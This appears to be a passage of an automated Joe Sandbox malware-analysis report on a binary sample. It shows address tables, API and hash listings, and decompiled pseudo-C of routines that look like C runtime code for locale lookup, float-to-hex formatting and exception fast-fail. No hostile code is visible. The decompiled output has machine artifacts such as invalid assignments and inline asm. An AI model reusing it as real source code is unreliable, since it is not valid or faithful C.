                                                                                      0x00000000
                                                                                      0x0042b8a8
                                                                                      0x0042b8bf
                                                                                      0x0042b8bf
                                                                                      0x0042b8c8
                                                                                      0x0042b8ca
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0042b8cc
                                                                                      0x0042b8d1
                                                                                      0x0042b8d3
                                                                                      0x0042b8d3
                                                                                      0x0042b8d9
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0042b8de
                                                                                      0x0042b8fc
                                                                                      0x0042b8fe
                                                                                      0x0042b921
                                                                                      0x00000000
                                                                                      0x0042b926
                                                                                      0x0042b919
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0042b91b
                                                                                      0x00000000
                                                                                      0x0042b91b
                                                                                      0x0042b8e0
                                                                                      0x0042b8e8
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0042b8ea
                                                                                      0x0042b8ed
                                                                                      0x0042b8f3
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0042b8f5
                                                                                      0x0042b8f7
                                                                                      0x0042b8f9
                                                                                      0x00000000
                                                                                      0x0042b8f9
                                                                                      0x0042b8aa
                                                                                      0x0042b8b2
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0042b8b4
                                                                                      0x0042b8b7
                                                                                      0x0042b8bd
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0042b8bd
                                                                                      0x0042b8c3
                                                                                      0x0042b8c5
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • GetLocaleInfoW.KERNEL32(?,2000000B,0042BB96,00000002,00000000,?,?,?,0042BB96,?,00000000), ref: 0042B911
                                                                                      • GetLocaleInfoW.KERNEL32(?,20001004,0042BB96,00000002,00000000,?,?,?,0042BB96,?,00000000), ref: 0042B93A
                                                                                      • GetACP.KERNEL32(?,?,0042BB96,?,00000000), ref: 0042B94F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.604085544.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_400000_4113.jbxd
                                                                                      Similarity
                                                                                      • API ID: InfoLocale
                                                                                      • String ID: ACP$OCP
                                                                                      • API String ID: 2299586839-711371036
                                                                                      • Opcode ID: baa951752c453f5e08ee5dfd05715e70370394d7da1a31da91ae6347c7eddb80
                                                                                      • Instruction ID: 587694517562672ddcb390d6997b9a768a075160a8bfa1f5444cbfb0e68a1466
                                                                                      • Opcode Fuzzy Hash: baa951752c453f5e08ee5dfd05715e70370394d7da1a31da91ae6347c7eddb80
                                                                                      • Instruction Fuzzy Hash: C821B872B00121A6DB349F55E900BA773AAEF54B50BD6C026EA09D7301EB36DE81C3DC
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 82%
                                                                                      			E00421F48(signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                                      				signed int _v5;
                                                                                      				signed int _v12;
                                                                                      				signed int _v16;
                                                                                      				signed int _v20;
                                                                                      				signed int _v24;
                                                                                      				unsigned int _v28;
                                                                                      				signed int _v32;
                                                                                      				signed int _v36;
                                                                                      				signed int _v40;
                                                                                      				signed int _v48;
                                                                                      				void* __ebx;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				void* __ebp;
                                                                                      				signed char _t87;
                                                                                      				void* _t93;
                                                                                      				intOrPtr _t94;
                                                                                      				signed int _t98;
                                                                                      				signed int _t100;
                                                                                      				signed int _t101;
                                                                                      				signed int _t104;
                                                                                      				signed int _t105;
                                                                                      				signed int _t106;
                                                                                      				signed int _t111;
                                                                                      				void* _t113;
                                                                                      				signed int _t114;
                                                                                      				void* _t115;
                                                                                      				void* _t118;
                                                                                      				void* _t120;
                                                                                      				void* _t122;
                                                                                      				signed int* _t124;
                                                                                      				void* _t127;
                                                                                      				signed int _t129;
                                                                                      				signed int _t131;
                                                                                      				signed int _t136;
                                                                                      				signed int* _t140;
                                                                                      				signed int _t141;
                                                                                      				signed int _t146;
                                                                                      				signed int _t147;
                                                                                      				signed int _t149;
                                                                                      				signed int _t154;
                                                                                      				signed int _t155;
                                                                                      				signed int _t156;
                                                                                      				signed int _t157;
                                                                                      				void* _t161;
                                                                                      				unsigned int _t162;
                                                                                      				intOrPtr _t171;
                                                                                      				signed int _t173;
                                                                                      				signed int* _t174;
                                                                                      				signed int _t176;
                                                                                      				signed int _t177;
                                                                                      				signed int _t178;
                                                                                      				signed int _t183;
                                                                                      				signed int _t184;
                                                                                      				signed int _t185;
                                                                                      				signed int _t186;
                                                                                      				signed int _t188;
                                                                                      				intOrPtr _t189;
                                                                                      				void* _t190;
                                                                                      
                                                                                      				_t186 = _a24;
                                                                                      				if(_t186 < 0) {
                                                                                      					_t186 = 0;
                                                                                      				}
                                                                                      				_t183 = _a8;
                                                                                      				_t3 = _t186 + 0xb; // 0xb
                                                                                      				 *_t183 = 0;
                                                                                      				if(_a12 > _t3) {
                                                                                      					_t140 = _a4;
                                                                                      					_t147 = _t140[1];
                                                                                      					_t173 =  *_t140;
                                                                                      					__eflags = (_t147 >> 0x00000014 & 0x000007ff) - 0x7ff;
                                                                                      					if(__eflags != 0) {
                                                                                      						__eflags = _t147;
                                                                                      						if(__eflags > 0) {
                                                                                      							L13:
                                                                                      							_t20 = _t183 + 1; // 0x2
                                                                                      							_t174 = _t20;
                                                                                      							_t87 = _a28 ^ 0x00000001;
                                                                                      							_v20 = 0x3ff;
                                                                                      							_v5 = _t87;
                                                                                      							_v16 = _t174;
                                                                                      							_v48 = ((_t87 & 0x000000ff) << 5) + 7;
                                                                                      							__eflags = _t147 & 0x7ff00000;
                                                                                      							_t93 = 0x30;
                                                                                      							if((_t147 & 0x7ff00000) != 0) {
                                                                                      								 *_t183 = 0x31;
                                                                                      								L18:
                                                                                      								_t149 = 0;
                                                                                      								__eflags = 0;
                                                                                      								L19:
                                                                                      								_t28 =  &(_t174[0]); // 0x2
                                                                                      								_t184 = _t28;
                                                                                      								__eflags = _t186;
                                                                                      								if(_t186 != 0) {
                                                                                      									_t94 = _a40;
                                                                                      									__eflags =  *((char*)(_t94 + 0x14));
                                                                                      									if(__eflags == 0) {
                                                                                      										E0041A250(_t94, _t174, __eflags);
                                                                                      										_t94 = _a40;
                                                                                      										_t174 = _v16;
                                                                                      									}
                                                                                      									_t149 = 0;
                                                                                      									__eflags = 0;
                                                                                      									_t98 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)) + 0x88))))));
                                                                                      								} else {
                                                                                      									_t98 = _t149;
                                                                                      								}
                                                                                      								 *_t174 = _t98;
                                                                                      								_t100 = _t140[1] & 0x000fffff;
                                                                                      								__eflags = _t100;
                                                                                      								_v40 = _t100;
                                                                                      								if(_t100 > 0) {
                                                                                      									L26:
                                                                                      									_t175 = _t149;
                                                                                      									_t150 = 0xf0000;
                                                                                      									_t101 = 0x30;
                                                                                      									_v12 = _t101;
                                                                                      									_v24 = _t149;
                                                                                      									_v28 = 0xf0000;
                                                                                      									while(1) {
                                                                                      										_v32 = _v12 & 0x0000ffff;
                                                                                      										_t104 = _t184;
                                                                                      										_v36 = _t184;
                                                                                      										_v40 = _t186;
                                                                                      										__eflags = _t186;
                                                                                      										if(__eflags <= 0) {
                                                                                      											break;
                                                                                      										}
                                                                                      										_t127 = E00431060( *_t140 & _t175, _v32 & 0x0000ffff, _t140[1] & _t150 & 0x000fffff);
                                                                                      										_t161 = 0x30;
                                                                                      										_t129 = _t127 + _t161 & 0x0000ffff;
                                                                                      										__eflags = _t129 - 0x39;
                                                                                      										if(_t129 > 0x39) {
                                                                                      											_t129 = _t129 + _v48;
                                                                                      											__eflags = _t129;
                                                                                      										}
                                                                                      										_t162 = _v28;
                                                                                      										_t175 = (_t162 << 0x00000020 | _v24) >> 4;
                                                                                      										 *_t184 = _t129;
                                                                                      										_t184 = _t184 + 1;
                                                                                      										_t150 = _t162 >> 4;
                                                                                      										_t131 = _v12 - 4;
                                                                                      										_t186 = _t186 - 1;
                                                                                      										_v24 = (_t162 << 0x00000020 | _v24) >> 4;
                                                                                      										_v28 = _t162 >> 4;
                                                                                      										_v12 = _t131;
                                                                                      										__eflags = _t131;
                                                                                      										if(_t131 >= 0) {
                                                                                      											continue;
                                                                                      										} else {
                                                                                      											goto L43;
                                                                                      										}
                                                                                      									}
                                                                                      									_t186 = _v40;
                                                                                      									_t184 = _t104;
                                                                                      									_t105 = E00422779(__eflags, _t140, _t175, _t150, _v32, _a36);
                                                                                      									_t190 = _t190 + 0x14;
                                                                                      									__eflags = _t105;
                                                                                      									if(_t105 == 0) {
                                                                                      										goto L43;
                                                                                      									}
                                                                                      									_t184 = _v36;
                                                                                      									_t146 = 0x30;
                                                                                      									_t124 = _t184 - 1;
                                                                                      									while(1) {
                                                                                      										_t156 =  *_t124;
                                                                                      										__eflags = _t156 - 0x66;
                                                                                      										if(_t156 == 0x66) {
                                                                                      											goto L36;
                                                                                      										}
                                                                                      										__eflags = _t156 - 0x46;
                                                                                      										if(_t156 != 0x46) {
                                                                                      											_t140 = _a4;
                                                                                      											__eflags = _t124 - _v16;
                                                                                      											if(_t124 == _v16) {
                                                                                      												_t65 = _t124 - 1;
                                                                                      												 *_t65 =  *(_t124 - 1) + 1;
                                                                                      												__eflags =  *_t65;
                                                                                      											} else {
                                                                                      												__eflags = _t156 - 0x39;
                                                                                      												if(_t156 != 0x39) {
                                                                                      													_t157 = _t156 + 1;
                                                                                      													__eflags = _t157;
                                                                                      												} else {
                                                                                      													_t157 = _v48 + 0x3a;
                                                                                      												}
                                                                                      												 *_t124 = _t157;
                                                                                      											}
                                                                                      											goto L43;
                                                                                      										}
                                                                                      										L36:
                                                                                      										 *_t124 = _t146;
                                                                                      										_t124 = _t124 - 1;
                                                                                      									}
                                                                                      								} else {
                                                                                      									__eflags =  *_t140 - _t149;
                                                                                      									if( *_t140 <= _t149) {
                                                                                      										L43:
                                                                                      										__eflags = _t186;
                                                                                      										if(_t186 > 0) {
                                                                                      											_push(_t186);
                                                                                      											_t122 = 0x30;
                                                                                      											_push(_t122);
                                                                                      											_push(_t184);
                                                                                      											E00415180(_t184);
                                                                                      											_t184 = _t184 + _t186;
                                                                                      											__eflags = _t184;
                                                                                      										}
                                                                                      										_t106 = _v16;
                                                                                      										__eflags =  *_t106;
                                                                                      										if( *_t106 == 0) {
                                                                                      											_t184 = _t106;
                                                                                      										}
                                                                                      										 *_t184 = (_v5 << 5) + 0x50;
                                                                                      										_t176 = _t140[1];
                                                                                      										_t111 = E00431060( *_t140, 0x34, _t176);
                                                                                      										_t141 = 0;
                                                                                      										_t188 = _t176 & 0;
                                                                                      										_t70 = _t184 + 2; // 0x2
                                                                                      										_t177 = _t70;
                                                                                      										_t154 = (_t111 & 0x000007ff) - _v20;
                                                                                      										__eflags = _t154;
                                                                                      										_v48 = _t177;
                                                                                      										asm("sbb esi, ebx");
                                                                                      										if(__eflags < 0) {
                                                                                      											L51:
                                                                                      											_t154 =  ~_t154;
                                                                                      											asm("adc esi, ebx");
                                                                                      											_t188 =  ~_t188;
                                                                                      											0x2b = 0x2d;
                                                                                      											goto L52;
                                                                                      										} else {
                                                                                      											if(__eflags > 0) {
                                                                                      												L50:
                                                                                      												L52:
                                                                                      												 *(_t184 + 1) = 0x2b;
                                                                                      												_t185 = _t177;
                                                                                      												_t113 = 0x30;
                                                                                      												 *_t177 = _t113;
                                                                                      												__eflags = _t188 - _t141;
                                                                                      												if(__eflags < 0) {
                                                                                      													L61:
                                                                                      													_t178 = 0x30;
                                                                                      													L62:
                                                                                      													__eflags = _t188 - _t141;
                                                                                      													if(__eflags < 0) {
                                                                                      														L66:
                                                                                      														_t155 = _t154 + _t178;
                                                                                      														__eflags = _t155;
                                                                                      														 *_t185 = _t155;
                                                                                      														 *(_t185 + 1) = _t141;
                                                                                      														L67:
                                                                                      														_t114 = 0;
                                                                                      														__eflags = 0;
                                                                                      														L68:
                                                                                      														return _t114;
                                                                                      													}
                                                                                      													if(__eflags > 0) {
                                                                                      														L65:
                                                                                      														_push(_t141);
                                                                                      														_push(_t141);
                                                                                      														_push(0xa);
                                                                                      														_push(_t188);
                                                                                      														_push(_t154);
                                                                                      														_t115 = E00430F60();
                                                                                      														_v48 = _t178;
                                                                                      														_t178 = 0x30;
                                                                                      														 *_t185 = _t115 + _t178;
                                                                                      														_t185 = _t185 + 1;
                                                                                      														_t141 = 0;
                                                                                      														__eflags = 0;
                                                                                      														goto L66;
                                                                                      													}
                                                                                      													__eflags = _t154 - 0xa;
                                                                                      													if(_t154 < 0xa) {
                                                                                      														goto L66;
                                                                                      													}
                                                                                      													goto L65;
                                                                                      												}
                                                                                      												if(__eflags > 0) {
                                                                                      													L55:
                                                                                      													_push(_t141);
                                                                                      													_push(_t141);
                                                                                      													_push(0x3e8);
                                                                                      													_push(_t188);
                                                                                      													_push(_t154);
                                                                                      													_t118 = E00430F60();
                                                                                      													_t188 = _t141;
                                                                                      													_v40 = _t177;
                                                                                      													_t177 = _v48;
                                                                                      													_t141 = 0;
                                                                                      													_t185 = _t177 + 1;
                                                                                      													 *_t177 = _t118 + 0x30;
                                                                                      													__eflags = _t185 - _t177;
                                                                                      													if(_t185 != _t177) {
                                                                                      														L59:
                                                                                      														_push(_t141);
                                                                                      														_push(_t141);
                                                                                      														_push(0x64);
                                                                                      														_push(_t188);
                                                                                      														_push(_t154);
                                                                                      														_t120 = E00430F60();
                                                                                      														_t188 = _t141;
                                                                                      														_v40 = _t177;
                                                                                      														_t141 = 0;
                                                                                      														_t178 = 0x30;
                                                                                      														 *_t185 = _t120 + _t178;
                                                                                      														_t185 = _t185 + 1;
                                                                                      														__eflags = _t185 - _v48;
                                                                                      														if(_t185 != _v48) {
                                                                                      															goto L65;
                                                                                      														}
                                                                                      														goto L62;
                                                                                      													}
                                                                                      													L56:
                                                                                      													__eflags = _t188 - _t141;
                                                                                      													if(__eflags < 0) {
                                                                                      														goto L61;
                                                                                      													}
                                                                                      													if(__eflags > 0) {
                                                                                      														goto L59;
                                                                                      													}
                                                                                      													__eflags = _t154 - 0x64;
                                                                                      													if(_t154 < 0x64) {
                                                                                      														goto L61;
                                                                                      													}
                                                                                      													goto L59;
                                                                                      												}
                                                                                      												__eflags = _t154 - 0x3e8;
                                                                                      												if(_t154 < 0x3e8) {
                                                                                      													goto L56;
                                                                                      												}
                                                                                      												goto L55;
                                                                                      											}
                                                                                      											__eflags = _t154;
                                                                                      											if(_t154 < 0) {
                                                                                      												goto L51;
                                                                                      											}
                                                                                      											goto L50;
                                                                                      										}
                                                                                      									}
                                                                                      									goto L26;
                                                                                      								}
                                                                                      							}
                                                                                      							 *_t183 = _t93;
                                                                                      							_t149 =  *_t140 | _t140[1] & 0x000fffff;
                                                                                      							__eflags = _t149;
                                                                                      							if(_t149 != 0) {
                                                                                      								_v20 = 0x3fe;
                                                                                      								goto L18;
                                                                                      							}
                                                                                      							_v20 = _t149;
                                                                                      							goto L19;
                                                                                      						}
                                                                                      						if(__eflags < 0) {
                                                                                      							L12:
                                                                                      							 *_t183 = 0x2d;
                                                                                      							_t183 = _t183 + 1;
                                                                                      							__eflags = _t183;
                                                                                      							_t147 = _t140[1];
                                                                                      							goto L13;
                                                                                      						}
                                                                                      						__eflags = _t173;
                                                                                      						if(_t173 >= 0) {
                                                                                      							goto L13;
                                                                                      						}
                                                                                      						goto L12;
                                                                                      					}
                                                                                      					_t114 = E00422274(_t140, _t147, _t173, __eflags, _t140, _t183, _a12, _a16, _a20, _t186, 0, _a32, _a36, _a40);
                                                                                      					__eflags = _t114;
                                                                                      					if(_t114 == 0) {
                                                                                      						_t136 = E00431110(_t183, 0x65);
                                                                                      						__eflags = _t136;
                                                                                      						if(_t136 != 0) {
                                                                                      							 *_t136 = ((_a28 ^ 0x00000001) << 5) + 0x50;
                                                                                      							 *((char*)(_t136 + 3)) = 0;
                                                                                      						}
                                                                                      						goto L67;
                                                                                      					}
                                                                                      					 *_t183 = 0;
                                                                                      					goto L68;
                                                                                      				}
                                                                                      				_t171 = _a40;
                                                                                      				_t189 = 0x22;
                                                                                      				 *((char*)(_t171 + 0x1c)) = 1;
                                                                                      				 *((intOrPtr*)(_t171 + 0x18)) = _t189;
                                                                                      				E00417FD2(_t183, _t189, 0, 0, 0, 0, 0, _t171);
                                                                                      				return _t189;
                                                                                      			}






























































                                                                                      0x00421f53
                                                                                      0x00421f59
                                                                                      0x00421f5b
                                                                                      0x00421f5b
                                                                                      0x00421f5d
                                                                                      0x00421f60
                                                                                      0x00421f63
                                                                                      0x00421f68
                                                                                      0x00421f8d
                                                                                      0x00421f90
                                                                                      0x00421f95
                                                                                      0x00421f9f
                                                                                      0x00421fa4
                                                                                      0x00421ffd
                                                                                      0x00421fff
                                                                                      0x0042200e
                                                                                      0x00422011
                                                                                      0x00422011
                                                                                      0x00422014
                                                                                      0x00422016
                                                                                      0x0042201d
                                                                                      0x0042202f
                                                                                      0x00422032
                                                                                      0x00422037
                                                                                      0x0042203b
                                                                                      0x0042203c
                                                                                      0x0042205c
                                                                                      0x0042205f
                                                                                      0x0042205f
                                                                                      0x0042205f
                                                                                      0x00422061
                                                                                      0x00422061
                                                                                      0x00422061
                                                                                      0x00422064
                                                                                      0x00422066
                                                                                      0x0042206c
                                                                                      0x0042206f
                                                                                      0x00422073
                                                                                      0x00422077
                                                                                      0x0042207c
                                                                                      0x0042207f
                                                                                      0x0042207f
                                                                                      0x00422085
                                                                                      0x00422085
                                                                                      0x0042208f
                                                                                      0x00422068
                                                                                      0x00422068
                                                                                      0x00422068
                                                                                      0x00422091
                                                                                      0x00422096
                                                                                      0x00422096
                                                                                      0x0042209b
                                                                                      0x0042209e
                                                                                      0x004220a8
                                                                                      0x004220aa
                                                                                      0x004220ac
                                                                                      0x004220b1
                                                                                      0x004220b2
                                                                                      0x004220b5
                                                                                      0x004220b8
                                                                                      0x004220bb
                                                                                      0x004220c1
                                                                                      0x004220c4
                                                                                      0x004220c6
                                                                                      0x004220c9
                                                                                      0x004220cc
                                                                                      0x004220ce
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004220e5
                                                                                      0x004220ec
                                                                                      0x004220f0
                                                                                      0x004220f3
                                                                                      0x004220f6
                                                                                      0x004220f8
                                                                                      0x004220f8
                                                                                      0x004220f8
                                                                                      0x004220fe
                                                                                      0x00422101
                                                                                      0x00422105
                                                                                      0x00422107
                                                                                      0x0042210b
                                                                                      0x0042210e
                                                                                      0x00422111
                                                                                      0x00422112
                                                                                      0x00422115
                                                                                      0x00422118
                                                                                      0x0042211b
                                                                                      0x0042211e
                                                                                      0x00000000
                                                                                      0x00422120
                                                                                      0x00000000
                                                                                      0x00422120
                                                                                      0x0042211e
                                                                                      0x00422125
                                                                                      0x00422128
                                                                                      0x00422130
                                                                                      0x00422135
                                                                                      0x00422138
                                                                                      0x0042213a
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0042213c
                                                                                      0x00422141
                                                                                      0x00422142
                                                                                      0x00422145
                                                                                      0x00422145
                                                                                      0x00422147
                                                                                      0x0042214a
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0042214c
                                                                                      0x0042214f
                                                                                      0x00422156
                                                                                      0x00422159
                                                                                      0x0042215c
                                                                                      0x00422171
                                                                                      0x00422171
                                                                                      0x00422171
                                                                                      0x0042215e
                                                                                      0x0042215e
                                                                                      0x00422161
                                                                                      0x0042216b
                                                                                      0x0042216b
                                                                                      0x00422163
                                                                                      0x00422166
                                                                                      0x00422166
                                                                                      0x0042216d
                                                                                      0x0042216d
                                                                                      0x00000000
                                                                                      0x0042215c
                                                                                      0x00422151
                                                                                      0x00422151
                                                                                      0x00422153
                                                                                      0x00422153
                                                                                      0x004220a0
                                                                                      0x004220a0
                                                                                      0x004220a2
                                                                                      0x00422174
                                                                                      0x00422174
                                                                                      0x00422176
                                                                                      0x00422178
                                                                                      0x0042217b
                                                                                      0x0042217c
                                                                                      0x0042217d
                                                                                      0x0042217e
                                                                                      0x00422186
                                                                                      0x00422186
                                                                                      0x00422186
                                                                                      0x00422188
                                                                                      0x0042218b
                                                                                      0x0042218e
                                                                                      0x00422190
                                                                                      0x00422190
                                                                                      0x0042219c
                                                                                      0x004221a0
                                                                                      0x004221a3
                                                                                      0x004221a8
                                                                                      0x004221b4
                                                                                      0x004221b6
                                                                                      0x004221b6
                                                                                      0x004221b9
                                                                                      0x004221b9
                                                                                      0x004221bc
                                                                                      0x004221bf
                                                                                      0x004221c1
                                                                                      0x004221cd
                                                                                      0x004221cd
                                                                                      0x004221d1
                                                                                      0x004221d3
                                                                                      0x004221d5
                                                                                      0x00000000
                                                                                      0x004221c3
                                                                                      0x004221c3
                                                                                      0x004221c9
                                                                                      0x004221d6
                                                                                      0x004221d6
                                                                                      0x004221d9
                                                                                      0x004221dd
                                                                                      0x004221de
                                                                                      0x004221e0
                                                                                      0x004221e2
                                                                                      0x0042223e
                                                                                      0x00422240
                                                                                      0x00422241
                                                                                      0x00422241
                                                                                      0x00422243
                                                                                      0x00422266
                                                                                      0x00422266
                                                                                      0x00422266
                                                                                      0x00422268
                                                                                      0x0042226a
                                                                                      0x0042226d
                                                                                      0x0042226d
                                                                                      0x0042226d
                                                                                      0x0042226f
                                                                                      0x00000000
                                                                                      0x0042226f
                                                                                      0x00422245
                                                                                      0x0042224c
                                                                                      0x0042224c
                                                                                      0x0042224d
                                                                                      0x0042224e
                                                                                      0x00422250
                                                                                      0x00422251
                                                                                      0x00422252
                                                                                      0x0042225b
                                                                                      0x0042225e
                                                                                      0x00422261
                                                                                      0x00422263
                                                                                      0x00422264
                                                                                      0x00422264
                                                                                      0x00000000
                                                                                      0x00422264
                                                                                      0x00422247
                                                                                      0x0042224a
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0042224a
                                                                                      0x004221e9
                                                                                      0x004221ef
                                                                                      0x004221ef
                                                                                      0x004221f0
                                                                                      0x004221f1
                                                                                      0x004221f2
                                                                                      0x004221f3
                                                                                      0x004221f4
                                                                                      0x004221f9
                                                                                      0x004221fd
                                                                                      0x00422202
                                                                                      0x00422205
                                                                                      0x00422207
                                                                                      0x0042220a
                                                                                      0x0042220c
                                                                                      0x0042220e
                                                                                      0x0042221b
                                                                                      0x0042221b
                                                                                      0x0042221c
                                                                                      0x0042221d
                                                                                      0x0042221f
                                                                                      0x00422220
                                                                                      0x00422221
                                                                                      0x00422226
                                                                                      0x0042222c
                                                                                      0x0042222f
                                                                                      0x00422231
                                                                                      0x00422234
                                                                                      0x00422236
                                                                                      0x00422237
                                                                                      0x0042223a
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0042223c
                                                                                      0x00422210
                                                                                      0x00422210
                                                                                      0x00422212
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00422214
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00422216
                                                                                      0x00422219
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00422219
                                                                                      0x004221eb
                                                                                      0x004221ed
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004221ed
                                                                                      0x004221c5
                                                                                      0x004221c7
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004221c7
                                                                                      0x004221c1
                                                                                      0x00000000
                                                                                      0x004220a2
                                                                                      0x0042209e
                                                                                      0x0042203e
                                                                                      0x0042204a
                                                                                      0x0042204a
                                                                                      0x0042204c
                                                                                      0x00422053
                                                                                      0x00000000
                                                                                      0x00422053
                                                                                      0x0042204e
                                                                                      0x00000000
                                                                                      0x0042204e
                                                                                      0x00422001
                                                                                      0x00422007
                                                                                      0x00422007
                                                                                      0x0042200a
                                                                                      0x0042200a
                                                                                      0x0042200b
                                                                                      0x00000000
                                                                                      0x0042200b
                                                                                      0x00422003
                                                                                      0x00422005
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00422005
                                                                                      0x00421fbe
                                                                                      0x00421fc6
                                                                                      0x00421fc8
                                                                                      0x00421fd5
                                                                                      0x00421fdc
                                                                                      0x00421fde
                                                                                      0x00421ff0
                                                                                      0x00421ff2
                                                                                      0x00421ff2
                                                                                      0x00000000
                                                                                      0x00421fde
                                                                                      0x00421fca
                                                                                      0x00000000
                                                                                      0x00421fca
                                                                                      0x00421f6a
                                                                                      0x00421f6f
                                                                                      0x00421f76
                                                                                      0x00421f7a
                                                                                      0x00421f7d
                                                                                      0x00000000

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.604085544.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_400000_4113.jbxd
                                                                                      Similarity
                                                                                      • API ID: _strrchr
                                                                                      • String ID:
                                                                                      • API String ID: 3213747228-0
                                                                                      • Opcode ID: 57f558dd77f97a6df339e016eee450913f8246513639b0d959086a0c6df0ca26
                                                                                      • Instruction ID: aaad6e97ca1db1231b3823d89b98c34407925629691d7612207573c5b9e4082b
                                                                                      • Opcode Fuzzy Hash: 57f558dd77f97a6df339e016eee450913f8246513639b0d959086a0c6df0ca26
                                                                                      • Instruction Fuzzy Hash: ABB18A32B04265AFDB158F28D981BFFBBA5EF59304F5441ABE900AB341C2BD9D01C769
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 85%
                                                                                      			E00413DCA(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
                                                                                      				char _v0;
                                                                                      				struct _EXCEPTION_POINTERS _v12;
                                                                                      				intOrPtr _v80;
                                                                                      				intOrPtr _v88;
                                                                                      				char _v92;
                                                                                      				intOrPtr _v608;
                                                                                      				intOrPtr _v612;
                                                                                      				void* _v616;
                                                                                      				intOrPtr _v620;
                                                                                      				char _v624;
                                                                                      				intOrPtr _v628;
                                                                                      				intOrPtr _v632;
                                                                                      				intOrPtr _v636;
                                                                                      				intOrPtr _v640;
                                                                                      				intOrPtr _v644;
                                                                                      				intOrPtr _v648;
                                                                                      				intOrPtr _v652;
                                                                                      				intOrPtr _v656;
                                                                                      				intOrPtr _v660;
                                                                                      				intOrPtr _v664;
                                                                                      				intOrPtr _v668;
                                                                                      				char _v808;
                                                                                      				char* _t39;
                                                                                      				long _t49;
                                                                                      				intOrPtr _t51;
                                                                                      				void* _t54;
                                                                                      				intOrPtr _t55;
                                                                                      				intOrPtr _t57;
                                                                                      				intOrPtr _t58;
                                                                                      				intOrPtr _t59;
                                                                                      				intOrPtr* _t60;
                                                                                      
                                                                                      				_t59 = __esi;
                                                                                      				_t58 = __edi;
                                                                                      				_t57 = __edx;
                                                                                      				if(IsProcessorFeaturePresent(0x17) != 0) {
                                                                                      					_t55 = _a4;
                                                                                      					asm("int 0x29");
                                                                                      				}
                                                                                      				E00413F8E(_t34);
                                                                                      				 *_t60 = 0x2cc;
                                                                                      				_v632 = E00415180(_t58,  &_v808, 0, 3);
                                                                                      				_v636 = _t55;
                                                                                      				_v640 = _t57;
                                                                                      				_v644 = _t51;
                                                                                      				_v648 = _t59;
                                                                                      				_v652 = _t58;
                                                                                      				_v608 = ss;
                                                                                      				_v620 = cs;
                                                                                      				_v656 = ds;
                                                                                      				_v660 = es;
                                                                                      				_v664 = fs;
                                                                                      				_v668 = gs;
                                                                                      				asm("pushfd");
                                                                                      				_pop( *_t15);
                                                                                      				_v624 = _v0;
                                                                                      				_t39 =  &_v0;
                                                                                      				_v612 = _t39;
                                                                                      				_v808 = 0x10001;
                                                                                      				_v628 =  *((intOrPtr*)(_t39 - 4));
                                                                                      				E00415180(_t58,  &_v92, 0, 0x50);
                                                                                      				_v92 = 0x40000015;
                                                                                      				_v88 = 1;
                                                                                      				_v80 = _v0;
                                                                                      				_t28 = IsDebuggerPresent() - 1; // -1
                                                                                      				_v12.ExceptionRecord =  &_v92;
                                                                                      				asm("sbb bl, bl");
                                                                                      				_v12.ContextRecord =  &_v808;
                                                                                      				_t54 =  ~_t28 + 1;
                                                                                      				SetUnhandledExceptionFilter(0);
                                                                                      				_t49 = UnhandledExceptionFilter( &_v12);
                                                                                      				if(_t49 == 0 && _t54 == 0) {
                                                                                      					_push(3);
                                                                                      					return E00413F8E(_t49);
                                                                                      				}
                                                                                      				return _t49;
                                                                                      			}


































                                                                                      0x00413dca
                                                                                      0x00413dca
                                                                                      0x00413dca
                                                                                      0x00413dde
                                                                                      0x00413de0
                                                                                      0x00413de3
                                                                                      0x00413de3
                                                                                      0x00413de7
                                                                                      0x00413dec
                                                                                      0x00413e04
                                                                                      0x00413e0a
                                                                                      0x00413e10
                                                                                      0x00413e16
                                                                                      0x00413e1c
                                                                                      0x00413e22
                                                                                      0x00413e28
                                                                                      0x00413e2f
                                                                                      0x00413e36
                                                                                      0x00413e3d
                                                                                      0x00413e44
                                                                                      0x00413e4b
                                                                                      0x00413e52
                                                                                      0x00413e53
                                                                                      0x00413e5c
                                                                                      0x00413e62
                                                                                      0x00413e65
                                                                                      0x00413e6b
                                                                                      0x00413e7a
                                                                                      0x00413e86
                                                                                      0x00413e91
                                                                                      0x00413e98
                                                                                      0x00413e9f
                                                                                      0x00413eaa
                                                                                      0x00413eb2
                                                                                      0x00413ebb
